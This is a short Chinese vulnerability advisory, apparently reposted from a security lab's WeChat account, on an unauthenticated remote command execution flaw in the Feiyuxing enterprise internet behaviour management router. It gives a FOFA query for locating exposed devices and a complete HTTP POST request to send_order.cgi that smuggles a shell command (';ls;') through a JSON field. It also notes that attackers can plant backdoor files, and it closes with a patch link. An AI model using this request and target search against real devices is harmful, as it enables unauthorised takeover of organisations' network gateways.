飞鱼星企业级智能上网行为管理系统前台RCE漏洞

0x02 漏洞描述

（一） 飞鱼星企业级智能上网行为管理系统

飞鱼星企业级智能上网行为管理系统是成都飞鱼星科技开发有限公司开发的一款上网行为管理路由器，专为中小企业、政府机关、教育及科研机构等用户设计，是具备“ 上网行为管理”、“多WAN路由器”以及“VPN网关”多重功能的新一代硬件网络接入设备。

（二） 漏洞简介

飞鱼星企业级智能上网行为管理系统 send_order.cgi接口处存在远程命令执行漏洞，未经身份验证的攻击者可以利用此漏洞执行任意指令，且写入后门文件可获取服务器权限，造成严重威胁。

fofa语法：

title=="飞鱼星企业级智能上网行为管理系统"

POST /send_order.cgi?parameter=operation HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencoded {"opid":"1","name":";ls;","type":"rest"}

0x03 修复方案

补丁地址：http://www.adslr.com/companyfile/6/

漏洞来源地址:https://blog.csdn.net/qq_41904294/article/details/136884282

原文始发于微信公众号（天擎攻防实验室）：【漏洞复现】飞鱼星企业级智能上网行为管理系统前台RCE漏洞